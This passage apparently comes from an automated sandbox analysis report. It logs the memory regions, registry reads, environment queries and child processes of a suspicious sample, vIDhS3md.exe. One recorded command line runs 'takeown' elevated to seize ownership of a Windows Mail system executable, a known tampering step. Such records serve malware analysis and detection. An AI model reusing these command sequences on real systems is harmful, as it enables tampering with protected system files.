| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007fb00000 | 0x7fb00000 | 0x7fbfffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fc00000 | 0x7fc00000 | 0x7fc22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fc24000 | 0x7fc24000 | 0x7fc24fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc27000 | 0x7fc27000 | 0x7fc29fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc2a000 | 0x7fc2a000 | 0x7fc2afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc2d000 | 0x7fc2d000 | 0x7fc2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0xcb4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #144: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #144 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c vIDhS3md.exe -accepteula "restaurant.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:56, Reason: Child Process |
| Unmonitor | End Time: 00:04:59, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc60 |
| Parent PID | 0x974 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C64
0x
C88
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000ad0000 | 0x00ad0000 | 0x00aeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ad0000 | 0x00ad0000 | 0x00adffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000ae0000 | 0x00ae0000 | 0x00ae3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000af0000 | 0x00af0000 | 0x00af1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000af0000 | 0x00af0000 | 0x00af3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b00000 | 0x00b00000 | 0x00b13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b20000 | 0x00b20000 | 0x00b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b60000 | 0x00b60000 | 0x00c5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c60000 | 0x00c60000 | 0x00c63fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000c70000 | 0x00c70000 | 0x00c70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c80000 | 0x00c80000 | 0x00c81fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c90000 | 0x00c90000 | 0x00ccffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cd0000 | 0x00cd0000 | 0x00cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00ce0000 | 0x00d9dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ee0000 | 0x00ee0000 | 0x00fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fe0000 | 0x00fe0000 | 0x0102ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01030000 | 0x01366fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e5a0000 | 0x7e5a0000 | 0x7e69ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e6a0000 | 0x7e6a0000 | 0x7e6c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e6c6000 | 0x7e6c6000 | 0x7e6c8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e6c9000 | 0x7e6c9000 | 0x7e6cbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e6cc000 | 0x7e6cc000 | 0x7e6ccfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e6cf000 | 0x7e6cf000 | 0x7e6cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 176, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0xcac, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #145: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #145 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Mail\wabmig.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:56, Reason: Child Process |
| Unmonitor | End Time: 00:04:58, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc68 |
| Parent PID | 0x6e0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C6C
0x
CA0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00170000 | 0x0017ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000fe0000 | 0x00fe0000 | 0x04fdffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004fe0000 | 0x04fe0000 | 0x04ffffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004fe0000 | 0x04fe0000 | 0x04feffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004ff0000 | 0x04ff0000 | 0x04ff3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005000000 | 0x05000000 | 0x05001fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x05000000 | 0x05004fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000005010000 | 0x05010000 | 0x05023fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005030000 | 0x05030000 | 0x0506ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005070000 | 0x05070000 | 0x050affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000050b0000 | 0x050b0000 | 0x050b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000050c0000 | 0x050c0000 | 0x050c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000050d0000 | 0x050d0000 | 0x050d1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x050e0000 | 0x0519dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000051a0000 | 0x051a0000 | 0x051dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051e0000 | 0x051e0000 | 0x0521ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x05220000 | 0x05249fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005220000 | 0x05220000 | 0x05220fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005230000 | 0x05230000 | 0x05230fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052b0000 | 0x052b0000 | 0x052bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052c0000 | 0x052c0000 | 0x0550ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052c0000 | 0x052c0000 | 0x053dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005410000 | 0x05410000 | 0x0550ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005510000 | 0x05510000 | 0x05697fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000056a0000 | 0x056a0000 | 0x05820fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005830000 | 0x05830000 | 0x06c2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06c30000 | 0x06f66fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74730000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007fcc0000 | 0x7fcc0000 | 0x7fdbffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fdc0000 | 0x7fdc0000 | 0x7fde2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fde4000 | 0x7fde4000 | 0x7fde4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fde8000 | 0x7fde8000 | 0x7fdeafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fdeb000 | 0x7fdeb000 | 0x7fdedfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fdee000 | 0x7fdee000 | 0x7fdeefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #146: vidhs3md.exe
177
0
| Information | Value |
|---|---|
| ID | #146 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:56, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc74 |
| Parent PID | 0xe4c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C78
0x
CA8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00807fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00990fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x01d9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001da0000 | 0x01da0000 | 0x01efffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74550000 | 0x745e1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74730000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
